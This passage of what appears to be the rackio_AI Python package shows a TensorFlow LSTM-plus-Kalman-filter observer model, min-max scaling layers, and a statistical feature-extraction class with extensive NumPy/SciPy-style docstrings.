self.add_gn = add_gn
if self.add_gn:
self.gaussian_noise = RackioGaussianNoise()
if min_max_values:
self.X_min, self.y_min, self.X_max, self.y_max = min_max_values
self.scaler = RackioDNNLayerScaler(self.X_min, self.X_max)
self.inverse_scaler = RackioDNNLayerInverseScaler(self.y_min, self.y_max)
def call(self, inputs):
r"""
**Parameters**
        * **:param inputs:** (Input tensor) concatenated features; the first two columns are the inlet / outlet pressure ($u$) and the remaining columns are the inlet / outlet flow ($z$)
"""
if self.add_gn:
inputs = self.gaussian_noise(inputs)
if self.scaler:
inputs = self.scaler(inputs)
u = inputs[:, :, 0:2]
z = inputs[:, :, 2:]
f_t, f, F = self.lstm_f(u)
h, H = self.lstm_H(f_t, f)
Q = self.lstm_Q(f_t)
R = self.lstm_R(z)
z = tf.reshape(z, (z.shape[1], z.shape[2]))[0, :]
z = tf.reshape(z, (z.shape[0], 1))
# Observer layer based on Kalman Filter
y = self.KF(z, f, F, h, H, Q, R)
if self.inverse_scaler:
y = self.inverse_scaler(y)
return y
def compile(
self,
optimizer=tf.keras.optimizers.Adam(
learning_rate=0.01,
amsgrad=True
),
loss='mse',
metrics=tf.keras.metrics.MeanAbsoluteError(),
loss_weights=None,
weighted_metrics=None,
run_eagerly=None,
steps_per_execution=None,
**kwargs
):
r"""
Configures the model for training.
**Parameters**
* **:param optimizer:** String (name of optimizer) or optimizer instance.
* **[tf.keras.optimizers.Adam](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adam)**:
Optimizer that implements the Adam algorithm.
* **[tf.keras.optimizers.Adadelta](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adadelta)**:
Optimizer that implements the Adadelta algorithm.
* **[tf.keras.optimizers.Adagrad](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adagrad)**:
Optimizer that implements the Adagrad algorithm.
* **[tf.keras.optimizers.Adamax](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adamax)**:
Optimizer that implements the Adamax algorithm.
* **[tf.keras.optimizers.Ftrl](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Ftrl)**:
Optimizer that implements the FTRL algorithm.
* **[tf.keras.optimizers.Nadam](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Nadam)**:
Optimizer that implements the Nadam algorithm.
* **[tf.keras.optimizers.RMSprop](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/RMSprop)**:
Optimizer that implements the RMSprop algorithm.
* **[tf.keras.optimizers.SGD](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/SGD)**:
Optimizer that implements the SGD algorithm.
* **:param loss:** String (name of objective function), objective function or tf.keras.losses.Loss
instance. See [tf.keras.losses](https://www.tensorflow.org/api_docs/python/tf/keras/losses).
An objective function is any callable with the signature loss = fn(y_true, y_pred),
where y_true = ground truth values with shape = [batch_size, d0, .. dN], except sparse loss
functions such as sparse categorical crossentropy where shape = [batch_size, d0, .. dN-1].
y_pred = predicted values with shape = [batch_size, d0, .. dN]. It returns a weighted loss float tensor.
If a custom Loss instance is used and reduction is set to NONE, return value has the shape [batch_size, d0, .. dN-1]
ie. per-sample or per-timestep loss values; otherwise, it is a scalar. If the model has multiple outputs,
you can use a different loss on each output by passing a dictionary or a list of losses. The loss value that
will be minimized by the model will then be the sum of all individual losses.
## Classes
* **[tf.keras.losses.BinaryCrossentropy](https://www.tensorflow.org/api_docs/python/tf/keras/losses/BinaryCrossentropy)**
Computes the cross-entropy loss between true labels and predicted labels.
* **[tf.keras.losses.CategoricalCrossentropy](https://www.tensorflow.org/api_docs/python/tf/keras/losses/CategoricalCrossentropy)**
Computes the crossentropy loss between the labels and predictions.
* **[tf.keras.losses.CategoricalHinge](https://www.tensorflow.org/api_docs/python/tf/keras/losses/CategoricalHinge)**
Computes the categorical hinge loss between y_true and y_pred.
* **[tf.keras.losses.CosineSimilarity](https://www.tensorflow.org/api_docs/python/tf/keras/losses/CosineSimilarity)**
Computes the cosine similarity between labels and predictions.
* **[tf.keras.losses.Hinge](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Hinge)**
Computes the hinge loss between y_true and y_pred.
* **[tf.keras.losses.Huber](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Huber)**
Computes the Huber loss between y_true and y_pred.
* **[tf.keras.losses.KLDivergence](https://www.tensorflow.org/api_docs/python/tf/keras/losses/KLDivergence)**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[tf.keras.losses.LogCosh](https://www.tensorflow.org/api_docs/python/tf/keras/losses/LogCosh)**
Computes the logarithm of the hyperbolic cosine of the prediction error.
* **[tf.keras.losses.MeanAbsoluteError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanAbsoluteError)**
Computes the mean of absolute difference between labels and predictions.
* **[tf.keras.losses.MeanAbsolutePercentageError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanAbsolutePercentageError)**
Computes the mean absolute percentage error between y_true and y_pred.
* **[tf.keras.losses.MeanSquaredError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanSquaredError)**
Computes the mean of squares of errors between labels and predictions.
* **[tf.keras.losses.MeanSquaredLogarithmicError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanSquaredLogarithmicError)**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[tf.keras.losses.Poisson](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Poisson)**
Computes the Poisson loss between y_true and y_pred.
* **[tf.keras.losses.Reduction](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Reduction)**
Types of loss reduction.
* **[tf.keras.losses.SparseCategoricalCrossentropy](https://www.tensorflow.org/api_docs/python/tf/keras/losses/SparseCategoricalCrossentropy)**
Computes the crossentropy loss between the labels and predictions.
* **[tf.keras.losses.SquaredHinge](https://www.tensorflow.org/api_docs/python/tf/keras/losses/SquaredHinge)**
Computes the squared hinge loss between y_true and y_pred.
## Functions
* **[KLD(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/KLD):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[MAE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MAE):**
Computes the mean absolute error between labels and predictions.
* **[MAPE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MAPE):**
Computes the mean absolute percentage error between y_true and y_pred.
* **[MSE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MSE):**
Computes the mean squared error between labels and predictions.
* **[MSLE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MSLE):**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[binary_crossentropy(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/binary_crossentropy):**
Computes the binary crossentropy loss.
* **[categorical_crossentropy(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/categorical_crossentropy):**
Computes the categorical crossentropy loss.
* **[categorical_hinge(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/categorical_hinge):**
Computes the categorical hinge loss between y_true and y_pred.
* **[cosine_similarity(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/cosine_similarity):**
Computes the cosine similarity between labels and predictions.
* **[deserialize(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/deserialize):**
Deserializes a serialized loss class/function instance.
* **[get(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/get):**
Retrieves a Keras loss as a function/Loss class instance.
* **[hinge(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/hinge):**
Computes the hinge loss between y_true and y_pred.
* **[huber(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/huber):**
Computes Huber loss value.
* **[kl_divergence(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/kl_divergence):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[kld(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/kld):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[kullback_leibler_divergence(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/kullback_leibler_divergence):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[log_cosh(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/log_cosh):**
Logarithm of the hyperbolic cosine of the prediction error.
* **[logcosh(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/logcosh):**
Logarithm of the hyperbolic cosine of the prediction error.
* **[mae(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mae):**
Computes the mean absolute error between labels and predictions.
* **[mape(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mape):**
Computes the mean absolute percentage error between y_true and y_pred.
* **[mean_absolute_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_absolute_error):**
Computes the mean absolute error between labels and predictions.
* **[mean_absolute_percentage_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_absolute_percentage_error):**
Computes the mean absolute percentage error between y_true and y_pred.
* **[mean_squared_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_squared_error):**
Computes the mean squared error between labels and predictions.
* **[mean_squared_logarithmic_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_squared_logarithmic_error):**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[mse(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mse):**
Computes the mean squared error between labels and predictions.
* **[msle(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/msle):**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[poisson(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/poisson):**
Computes the Poisson loss between y_true and y_pred.
* **[serialize(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/serialize):**
Serializes loss function or Loss instance.
* **[sparse_categorical_crossentropy(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/sparse_categorical_crossentropy):**
Computes the sparse categorical crossentropy loss.
* **[squared_hinge(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/squared_hinge):**
Computes the squared hinge loss between y_true and y_pred.
* **:param metrics:** List of metrics to be evaluated by the model during training and testing.
Each of this can be a string (name of a built-in function), function or a
[tf.keras.metrics.Metric](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/Metric) instance.
See [tf.keras.metrics](https://www.tensorflow.org/api_docs/python/tf/keras/metrics).
Typically you will use *metrics=['accuracy']*. A function is any callable with the signature
result = fn(y_true, y_pred). To specify different metrics for different outputs of a multi-output model,
you could also pass a dictionary, such as *metrics={'output_a': 'accuracy', 'output_b': ['accuracy', 'mse']}*.
You can also pass a list *(len = len(outputs))* of lists of metrics such as
*metrics=[['accuracy'], ['accuracy', 'mse']] or metrics=['accuracy', ['accuracy', 'mse']]*.
When you pass the strings 'accuracy' or 'acc', we convert this to one of
[tf.keras.metrics.BinaryAccuracy](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/BinaryAccuracy),
[tf.keras.metrics.CategoricalAccuracy](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/CategoricalAccuracy),
[tf.keras.metrics.SparseCategoricalAccuracy](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/SparseCategoricalAccuracy)
based on the loss function used and the model output shape. We do a similar conversion for the strings
'crossentropy' and 'ce' as well.
* **:param loss_weights:** Optional list or dictionary specifying scalar coefficients (Python floats)
to weight the loss contributions of different model outputs. The loss value that will be minimized
by the model will then be the weighted sum of all individual losses, weighted by the loss_weights coefficients.
If a list, it is expected to have a 1:1 mapping to the model's outputs. If a dict, it is expected
to map output names (strings) to scalar coefficients.
* **:param weighted_metrics:** List of metrics to be evaluated and weighted by sample_weight or class_weight
during training and testing.
* **:param run_eagerly:** Bool. Defaults to *False*. If *True*, this Model's logic will not be wrapped in a
[tf.function](https://www.tensorflow.org/api_docs/python/tf/function). Recommended to leave this as None
unless your Model cannot be run inside a *tf.function*.
* **:param steps_per_execution:** Int. Defaults to 1. The number of batches to run during each tf.function call.
Running multiple batches inside a single tf.function call can greatly improve performance on TPUs or small
models with a large Python overhead. At most, one full epoch will be run each execution.
If a number larger than the size of the epoch is passed, the execution will be truncated to the size of the epoch.
Note that if steps_per_execution is set to N,
[Callback.on_batch_begin and Callback.on_batch_end](https://www.tensorflow.org/api_docs/python/tf/keras/callbacks/Callback)
methods will only be called every N batches (i.e. before/after each tf.function execution).
* **:param kwargs:** Arguments supported for backwards compatibility only.
**Raise**
* **ValueError:** In case of invalid arguments for *optimizer*, *loss* or *metrics*.
"""
super(RackioObserver, self).compile(
optimizer=optimizer,
loss=loss,
metrics=metrics,
loss_weights=loss_weights,
weighted_metrics=weighted_metrics,
run_eagerly=run_eagerly,
steps_per_execution=steps_per_execution,
**kwargs
)
def fit(
self,
*training_data,
validation_data=None,
epochs=3,
callbacks=[
tf.keras.callbacks.EarlyStopping(
monitor='val_loss',
patience=3,
min_delta=1e-6,
mode='min')
],
**kwargs
):
r"""
Trains the model for a fixed number of epochs (iterations on a dataset).
**Parameters**
* **:param x:** Input data. It could be:
* A Numpy array (or array-like), or a list of arrays (in case the model has multiple inputs).
* A TensorFlow tensor, or a list of tensors (in case the model has multiple inputs).
* A dict mapping input names to the corresponding array/tensors, if the model has named inputs.
* A [tf.data](https://www.tensorflow.org/guide/data) dataset. Should return a tuple of either
(inputs, targets) or (inputs, targets, sample_weights).
* A generator or [tf.keras.utils.Sequence](https://www.tensorflow.org/api_docs/python/tf/keras/utils/Sequence)
returning (inputs, targets) or (inputs, targets, sample_weights).
A more detailed description of unpacking behavior for iterator types (Dataset, generator, Sequence)
is given below.
* **:param y:** Target data. Like the input data x, it could be either Numpy array(s) or TensorFlow tensor(s).
It should be consistent with x (you cannot have Numpy inputs and tensor targets, or inversely).
If x is a dataset, generator, or keras.utils.Sequence instance, y should not be specified
(since targets will be obtained from x).
"""
x, y = training_data
history = super(RackioObserver, self).fit(
x,
y,
validation_data=validation_data,
epochs=epochs,
callbacks=callbacks,
**kwargs
)
return history
def predict(self, x, **kwargs):
r"""
Documentation here
"""
return super(RackioObserver, self).predict(x, **kwargs)
def evaluate(
self,
x=None,
y=None,
**kwargs
):
r"""
Documentation here
"""
evaluation = super(RackioObserver, self).evaluate(x, y, **kwargs)
return evaluation
```
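For reference, the predict/correct cycle carried out by `RackioKF.call` corresponds to the standard extended Kalman filter update, with `f`, `F`, `h`, `H`, `Q` and `R` supplied by the LSTM layers above (notation follows the variable names in the code, and $f_0$ denotes the first row of $f$):

```latex
\begin{aligned}
P_t^{-}   &= F \, P_{t-1} \, F^{\top} + Q                                        &&\text{predicted error covariance}\\
K_t       &= P_t^{-} H^{\top} \left( H \, P_t^{-} \, H^{\top} + R \right)^{-1}   &&\text{Kalman gain}\\
\hat{y}_t &= f_0 + K_t \,(z_t - h)                                               &&\text{corrected state estimate}\\
P_t       &= (I - K_t H)\, P_t^{-}                                               &&\text{corrected error covariance}
\end{aligned}
```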
#### File: rackio_AI/models/scaler.py
```python
import numpy as np
import tensorflow as tf
class RackioDNNScaler:
r"""
Documentation here
"""
def __init__(self, scaler):
r"""
Documentation here
"""
self.input_scaler = scaler['inputs']
self.output_scaler = scaler['outputs']
def apply(self, inputs, **kwargs):
r"""
Documentation here
"""
# INPUT SCALING
samples, timesteps, features = inputs.shape
_inputs_list = list()
for feature in range(features):
_inputs = tf.reshape(inputs[:, :, feature], (-1, 1))
_inputs = self.input_scaler[feature](_inputs)
_inputs = tf.reshape(_inputs, (samples, timesteps, 1))
_inputs_list.append(_inputs)
scaled_inputs = tf.concat(_inputs_list, axis=2)
# scaled_inputs = np.concatenate([
# self.input_scaler[feature](inputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
# ], axis=2)
# OUTPUT SCALING
if 'outputs' in kwargs:
outputs = kwargs['outputs']
samples, timesteps, features = outputs.shape
_outputs_list = list()
for feature in range(features):
_outputs = tf.reshape(outputs[:, :, feature], (-1, 1))
_outputs = self.output_scaler[feature](_outputs)
_outputs = tf.reshape(_outputs, (samples, timesteps, 1))
_outputs_list.append(_outputs)
scaled_outputs = tf.concat(_outputs_list, axis=2)
# scaled_outputs = np.concatenate([
# self.output_scaler[feature](outputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
# ], axis=2)
return scaled_inputs, scaled_outputs
return scaled_inputs
def inverse(self, *outputs):
r"""
Documentation here
"""
result = list()
for output in outputs:
features = output.shape[-1]
samples = output.shape[0]
# INVERSE APPLY
scaled_output = np.concatenate([
self.output_scaler[feature].inverse(output[:, feature].reshape(-1, 1)).reshape((samples, features, 1)) for feature in range(features)
], axis=2)
result.append(scaled_output)
return tuple(result)
class RackioDNNLayerScaler(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, X_min, X_max, **kwargs):
r"""
Documentation here
"""
super().__init__(**kwargs)
self.X_min = X_min
self.X_max = X_max
def call(self, X):
r"""
Documentation here
"""
X = (X - self.X_min) / (self.X_max - self.X_min)
return X
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {**base_config, "X_max": self.X_max, "X_min": self.X_min}
class RackioDNNLayerInverseScaler(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, y_min, y_max, **kwargs):
r"""
Documentation here
"""
super().__init__(**kwargs)
self.y_min = y_min
self.y_max = y_max
def call(self, y):
r"""
Documentation here
"""
y = y * (self.y_max - self.y_min) + self.y_min
return y
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {**base_config, "y_max": self.y_max, "y_min": self.y_min}
```
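`RackioDNNLayerScaler` and `RackioDNNLayerInverseScaler` are exact inverses of each other when built from the same bounds, which is what allows `RackioObserver` to scale its inputs and unscale its predictions. A quick round-trip check (tensor values are illustrative):

```python
import tensorflow as tf
from rackio_AI.models.scaler import RackioDNNLayerScaler, RackioDNNLayerInverseScaler  # path from the file header above

y_min, y_max = 0.0, 100.0
scale = RackioDNNLayerScaler(y_min, y_max)            # maps [0, 100] to [0, 1]
unscale = RackioDNNLayerInverseScaler(y_min, y_max)   # maps [0, 1] back to [0, 100]

y = tf.constant([[25.0], [50.0], [75.0]])
print(unscale(scale(y)))  # recovers [[25.], [50.], [75.]]
```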
#### File: rackio_AI/preprocessing/feature_extraction.py
```python
from scipy.stats import kurtosis, skew
from rackio_AI.utils.utils_core import Utils
import pywt
import numpy as np
import pandas as pd
from rackio_AI.decorators.wavelets import WaveletDeco
from easy_deco.progress_bar import ProgressBar
from easy_deco.del_temp_attr import set_to_methods, del_temp_attr
# @set_to_methods(del_temp_attr)
class StatisticalsFeatures:
"""
    When we consider the original discretized time-domain signal, some basic discriminative
    information can be extracted in the form of statistical parameters from the $n$ samples
    $s_{1},\cdots s_{n}$
"""
_instances = list()
def mean(
self,
s,
axis=None,
dtype=None,
out=None,
keepdims=np._NoValue
):
r"""
Compute the arithmetic mean along the specified axis.
Returns the average of the array elements. The average is taken over
the flattened array by default, otherwise over the specified axis.
`float64` intermediate and return values are used for integer inputs.
**Parameters**
* **s:** (2d array_like) Array containing numbers whose mean is desired. If `s` is not an
array, a conversion is attempted.
* **axis:** (None or int or tuple of ints, optional) Axis or axes along which the means are computed.
The default is to compute the mean of the flattened array.
If this is a tuple of ints, a mean is performed over multiple axes, instead of a single axis or all the
axes as before.
* **dtype:** (data-type, optional) Type to use in computing the mean. For integer inputs, the default
is `float64`; for floating point inputs, it is the same as the input dtype.
* **out:** (ndarray, optional) Alternate output array in which to place the result. The default
is ``None``; if provided, it must have the same shape as the expected output, but the type will be cast if
necessary.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast correctly against the
input array. If the default value is passed, then `keepdims` will not be passed through to the `mean` method
of sub-classes of `ndarray`, however any non-default value will be. If the sub-class' method does not implement
`keepdims` any exceptions will be raised.
**Returns**
* **m:** (ndarray, see dtype parameter above) If `out=None`, returns a new array containing the mean values,
otherwise a reference to the output array is returned.
## Snippet code
```python
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([[1, 2], [3, 4]])
>>> feature_extraction.stats.mean(s)
2.5
>>> feature_extraction.stats.mean(s, axis=0)
array([2., 3.])
>>> feature_extraction.stats.mean(s, axis=1)
array([1.5, 3.5])
```
"""
s = Utils.check_dataset_shape(s)
return np.mean(s, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
def median(
self,
s,
axis=None,
out=None,
overwrite_input=False,
keepdims=False
):
r"""
Compute the median along the specified axis.
Returns the median of the array elements.
**Parameters**
* **s:** (2d array_like) Input array or object that can be converted to an array.
* **axis:** ({int, sequence of int, None}, optional) Axis or axes along which the medians \
are computed. The default is to compute the median along a flattened version of the array.
* **out:** (ndarray, optional) Alternative output array in which to place the result. It must
have the same shape and buffer length as the expected output, but the type (of the output)
will be cast if necessary.
* **overwrite_input:** (bool, optional) If True, then allow use of memory of input array
`s` for calculations. The input array will be modified by the call to `median`.
This will save memory when you do not need to preserve the contents of the input array.
Treat the input as undefined, but it will probably be fully or partially sorted. Default is
False. If `overwrite_input` is ``True`` and `s` is not already an `ndarray`, an error
will be raised.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast
correctly against the original `array`.
**Returns**
* **median:** (ndarray) A new array holding the result. If the input contains integers
or floats smaller than ``float64``, then the output data-type is ``np.float64``.
Otherwise, the data-type of the output is the same as that of the input. If `out` is
specified, that array is returned instead.
## Notes
Given a vector $V$ of length $N$, the median of $V$ is the
        middle value of a sorted copy of $V$, $V_{sorted}$, i.e.
        $V_{sorted}\left[\frac{N-1}{2}\right]$ when $N$ is odd, and the average of the
two middle values of $V_{sorted}$ when $N$ is even.
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([[10, 7, 4], [3, 2, 1]])
>>> feature_extraction.stats.median(s)
3.5
>>> feature_extraction.stats.median(s, axis=0)
array([6.5, 4.5, 2.5])
>>> feature_extraction.stats.median(s, axis=1)
array([7., 2.])
>>> m = feature_extraction.stats.median(s, axis=0)
>>> out = np.zeros_like(m)
>>> feature_extraction.stats.median(s, axis=0, out=m)
array([6.5, 4.5, 2.5])
>>> m
array([6.5, 4.5, 2.5])
>>> b = s.copy()
>>> feature_extraction.stats.median(b, axis=1, overwrite_input=True)
array([7., 2.])
>>> assert not np.all(s==b)
>>> b = s.copy()
>>> feature_extraction.stats.median(b, axis=None, overwrite_input=True)
3.5
>>> assert not np.all(s==b)
```
"""
s = Utils.check_dataset_shape(s)
return np.median(
s,
axis=axis,
out=out,
overwrite_input=overwrite_input,
keepdims=keepdims
)
def kurt(
self,
s,
axis: int=0,
fisher: bool=True,
bias: bool=True,
nan_policy: str='propagate'
):
r"""
Compute the kurtosis (Fisher or Pearson) of a dataset $s$
Kurtosis is the fourth central moment divided by the square of the variance. If Fisher's definition
is used, then 3.0 is subtracted from the result to give 0.0 for a normal distribution.
If bias is False, then the kurtosis is calculated using k-statistics to eliminate bias coming from
biased moment estimators.
**Parameters**
* **s:** (2d array) Data for which the kurtosis is calculated
* **axis:** (int or None) Axis along which the kurtosis is calculated. Default is 0. If None, compute
over the whole array dataset.
* **fisher:** (bool) If True, Fisher's definition is used (normal ==> 0.0). If False, Pearson's definition
is used (normal ==> 3.0).
* **bias:** (bool) If False, then the calculations are corrected for statistical bias.
* **nan_policy:** ({'propagate', 'raise', 'omit'}) Defines how to handle when the input contains nan. 'propagate'
returns nan, 'raise' throws an error, 'omit' performs the calculations ignoring nan values. Default is 'propagate'.
**Returns**
* **kurtosis** (array 1xcols_dataset) The kurtosis of values along an axis. If all values are equal, return -3 for Fisher's definition
and 0 for Pearson's definition
## Snippet Code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.kurt(s)
array([-0.06928694])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.kurt(s)
array([-0.00560946, -0.1115389 ])
```
"""
s = Utils.check_dataset_shape(s)
return kurtosis(
s,
axis=axis,
fisher=fisher,
bias=bias,
nan_policy=nan_policy
)
def std(
self,
s,
axis=None,
dtype=None,
out=None,
ddof=0,
keepdims=np._NoValue
):
r"""
Compute the standard deviation along the specified axis.
Returns the standard deviation, a measure of the spread of a distribution,
of the array elements. The standard deviation is computed for the
flattened array by default, otherwise over the specified axis.
**Parameters**
* **s:** (2d array_like) Calculate the standard deviation of these values.
* **axis:** (None or int or tuple of ints, optional) Axis or axes along which the standard deviation is computed.
The default is to compute the standard deviation of the flattened array.
If this is a tuple of ints, a standard deviation is performed over multiple axes, instead of a single
axis or all the axes as before.
* **dtype:** (dtype, optional) Type to use in computing the standard deviation. For arrays of
integer type the default is float64, for arrays of float types it is the same as the array type.
* **out:** (ndarray, optional) Alternative output array in which to place the result. It must have
the same shape as the expected output but the type (of the calculated values) will be cast if necessary.
* **ddof:** (int, optional) Means Delta Degrees of Freedom. The divisor used in calculations
is $N - ddof$, where $N$ represents the number of elements. By default `ddof` is zero.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast correctly
against the input array. If the default value is passed, then `keepdims` will not be passed through
to the `std` method of sub-classes of `ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any exceptions will be raised.
**Returns**
* **standard_deviation:** (ndarray) If `out` is None, return a new array containing the standard deviation,
otherwise return a reference to the output array.
## Notes
The standard deviation is the square root of the average of the squared
deviations from the mean, i.e.
$\mu = \frac{1}{N}\sum_{i=1}^{N}s_{i}$
$std = \sqrt{\frac{1}{N}\sum_{i=1}^{N}|s_{i}-\mu|^2}$
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([[1, 2], [3, 4]])
>>> feature_extraction.stats.std(s, axis=0)
array([1., 1.])
>>> feature_extraction.stats.std(s, axis=1)
array([0.5, 0.5])
```
### In single precision, std() can be inaccurate
```python
>>> s = np.zeros((2, 512*512), dtype=np.float32)
>>> s[0, :] = 1.0
>>> s[1, :] = 0.1
>>> feature_extraction.stats.std(s)
0.45000005
>>> s = np.array([[14, 8, 11, 10], [7, 9, 10, 11], [10, 15, 5, 10]])
>>> feature_extraction.stats.std(s)
2.614064523559687
```
"""
s = Utils.check_dataset_shape(s)
return np.std(
s,
axis=axis,
dtype=dtype,
out=out,
ddof=ddof,
keepdims=keepdims
)
def skew(
self,
s,
axis=0,
bias=True,
nan_policy='propagate'
):
r"""
Compute the sample skewness of a data set.
For normally distributed data, the skewness should be about zero. For
unimodal continuous distributions, a skewness value greater than zero means
that there is more weight in the right tail of the distribution. The
function `skewtest` can be used to determine if the skewness value
is close enough to zero, statistically speaking.
**Parameters**
* **s:** (ndarray) Input array.
* **axis:** (int or None, optional) Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `s`.
* **bias:** (bool, optional) If False, then the calculations are corrected for statistical bias.
* **nan_policy:** ({'propagate', 'raise', 'omit'}, optional) Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
**Returns**
* **skewness:** (ndarray) The skewness of values along an axis, returning 0 where all values are equal.
## Notes
The sample skewness is computed as the Fisher-Pearson coefficient
of skewness, i.e.
$g_1=\frac{m_3}{m_2^{3/2}}$
where
$m_i=\frac{1}{N}\sum_{n=1}^N(x[n]-\bar{x})^i$
is the biased sample $i\texttt{th}$ central moment, and $\bar{x}$ is
the sample mean. If $bias$ is False, the calculations are
corrected for bias and the value computed is the adjusted
Fisher-Pearson standardized moment coefficient, i.e.
$G_1=\frac{k_3}{k_2^{3/2}}=\frac{\sqrt{N(N-1)}}{N-2}\frac{m_3}{m_2^{3/2}}.$
## References
.. [1] <NAME>. and <NAME>. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([1, 2, 3, 4, 5])
>>> feature_extraction.stats.skew(s)
array([0.])
>>> s = np.array([2, 8, 0, 4, 1, 9, 9, 0])
>>> feature_extraction.stats.skew(s)
array([0.26505541])
```
"""
s = Utils.check_dataset_shape(s)
return skew(
s,
axis=axis,
bias=bias,
nan_policy=nan_policy
)
def rms(
self,
s,
axis=None,
dtype=None,
out=None,
keepdims=np._NoValue,
initial=np._NoValue
):
r"""
Root Mean Square (RMS). One of the most important basic features that can be extracted directly from the time-domain
signal is the RMS, which describes the energy of the signal. It is defined as the square root
of the average squared value of the signal and can also be called the normalized energy of the
signal.
$RMS = \sqrt{\frac{1}{n}\sum_{i=0}^{n-1}s_{i}^{2}}$
Especially in vibration analysis the RMS is used to perform fault detection, i.e. triggering an
alarm, whenever the RMS surpasses a level that depends on the size of the machine, the nature
of the signal (for instance velocity or acceleration), the position of the accelerometer, and so on.
After the detection of the existence of a failure, fault diagnosis is performed relying on more
sophisticated features. For instance the ISO 2372 (VDI 2056) norms define three different velocity
RMS alarm levels for four different machine classes divided by power and foundations of the rotating
machines.
RMS of array elements over a given axis.
**Parameters**
* **s:** (2d array_like) Elements to get RMS.
* **axis:** (None or int or tuple of ints, optional) Axis or axes along which a RMS is performed.
The default, axis=None, will get RMS of all the elements of the input array. If axis is negative
it counts from the last to the first axis. If axis is a tuple of ints, a RMS is performed on all
of the axes specified in the tuple instead of a single axis or all the axes as before.
